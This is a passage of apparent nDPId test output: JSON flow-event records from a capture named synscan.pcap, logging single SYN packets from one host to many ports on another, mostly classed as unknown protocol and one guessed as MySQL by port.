-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061213,"flow_last_seen":1278275061213,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1248,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 